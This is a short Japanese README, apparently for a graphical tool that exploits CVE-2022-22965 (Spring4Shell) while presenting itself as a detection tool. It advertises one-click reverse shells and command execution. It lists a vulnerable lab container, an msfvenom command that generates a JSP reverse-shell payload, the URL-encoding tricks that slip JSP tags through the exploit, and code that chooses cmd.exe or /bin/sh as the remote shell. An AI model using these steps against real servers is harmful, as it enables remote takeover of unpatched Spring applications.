
CVE-2022-22965(Spring4Shell)のグラフィカル検出ツール。ワンクリックでのリバースシェル生成、コマンド実行、複数サーバー対応のシェルパス適応機能を備えています。
標的マシン
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
リバースシェルは実質的にmsfvenomを参照しています
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
jspをURLエンコードした後、次を使用します
%3C%25替换 %25%7Bc2%7Di 代表<%
%25%3E 替换 %25%7Bsuffix%7Di 代表 %>
コードではサーバーの種類に応じてshellpathを変更する判定を行っています
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
コマンド実行:
whoamiプローブ:
ワンクリックリバースシェル
